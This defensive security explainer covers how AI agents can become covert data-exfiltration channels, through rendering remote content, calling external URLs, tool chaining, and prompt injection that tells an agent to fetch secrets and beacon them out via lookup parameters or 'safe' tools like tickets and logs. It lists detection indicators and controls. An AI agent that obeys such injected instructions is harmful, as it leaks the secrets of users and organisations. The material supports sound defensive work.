Subscribe to the Non-Human & AI Identity Journal

How can organisations tell whether AI agents are exposed to covert exfiltration paths?

Look for any workflow where the agent can render remote content, call external URLs, or transform retrieved data into network requests. If those steps happen automatically, the agent may have an exfiltration channel even when users never click anything. That signal deserves immediate containment review.

Why This Matters for Security Teams

Covert exfiltration paths in AI agents are hard to spot because the agent does not need a visible “download” step to leak data. Any workflow that can render remote content, fetch external URLs, or convert retrieved text into a request can become a hidden outbound channel. That is why agent risk is not just about model prompts, but about tool access, execution authority, and where outputs are allowed to go.

The problem is amplified by the autonomous nature of agentic systems: an agent can chain tools, follow instructions embedded in content, and move data in ways that look like normal task completion. Current guidance from the OWASP Agentic AI Top 10 and NHI research from AI Agents: The New Attack Surface report both point to the same operational reality: exposed agents often leak through legitimate capabilities, not obvious malware-like behavior. In practice, many security teams encounter exfiltration only after a routine agent workflow has already touched sensitive data and sent it somewhere unexpected.

How It Works in Practice

Security teams should map agent workflows end to end and ask one question at every step: can this action create an outbound side effect? A harmless-looking summarisation task becomes risky if the agent can follow links, open attachments, call APIs, or generate prompts that include secrets, tokens, or internal data. The path is often indirect. For example, a retrieval step can pull sensitive content, a transformation step can encode that content into a URL or request body, and a tool call can send it off-network without user interaction.

Detection usually depends on observing both the agent runtime and the tools it can reach. Review browser-like tools, document processors, code interpreters, webhook integrations, and any connector that can talk to external systems. Align that review with NIST AI Risk Management Framework practices for mapping context, function, and impact, and compare findings with NHI breach patterns documented in The 52 NHI breaches Report. Practical indicators include:

  • Agents that can render remote HTML, markdown, or emails with active links.
  • Agents that can call arbitrary URLs or make outbound HTTP requests.
  • Agents that can turn retrieved content into prompts, queries, or API payloads.
  • Agents that have access to long-lived secrets, especially in shared workspaces.
  • Agents that can chain multiple tools without a human approval point.

Where possible, require workload identity for each agent, enforce short-lived credentials, and inspect egress at the tool boundary rather than only at the network perimeter. These controls tend to break down when agents are given broad connector access in development or test environments and later promoted into production without a fresh containment review.

Common Variations and Edge Cases

Tighter outbound controls often increase workflow friction, requiring organisations to balance data-loss prevention against agent usefulness. That tradeoff becomes especially sharp in multi-agent systems, where one agent prepares content and another agent sends it onward. Best practice is still evolving, but current guidance suggests treating any agent that can touch untrusted content as potentially exposed until proven otherwise.

One common edge case is indirect exfiltration through “safe” tools. An agent may not be allowed to email externally, yet it can place content into tickets, logs, chat messages, or dashboards that are later exported. Another is prompt-injection via remote content that instructs the agent to retrieve secrets or beacon data out through a lookup parameter. The AI LLM hijack breach and the Anthropic report on AI-orchestrated cyber espionage show how quickly tool chaining can turn a normal task into a data-removal path. For broader pattern recognition, NHI teams also use the OWASP NHI Top 10 to identify where autonomous behaviour and credential exposure intersect.

The clearest signal is not whether the agent is “allowed” to act, but whether it can do so in a way that silently moves sensitive data across trust boundaries. That is the point where containment, tool restriction, and runtime policy evaluation should be revisited.

Standards & Framework Alignment

This section maps relevant standards and security frameworks to the operational risks and controls described in this guidance.

OWASP Agentic AI Top 10 and CSA MAESTRO address the attack and risk surface, while NIST AI RMF set the governance and control requirements practitioners need to meet.

Framework Control / Reference Relevance
OWASP Agentic AI Top 10 A3 Covers tool abuse and prompt-injection paths that enable covert agent exfiltration.
CSA MAESTRO TA-2 Addresses agent threat modeling for tool chaining and hidden outbound paths.
NIST AI RMF AI RMF supports mapping agent context, impact, and misuse risk for exfiltration paths.

Restrict tools and inspect agent inputs for instructions that could redirect data out of bounds.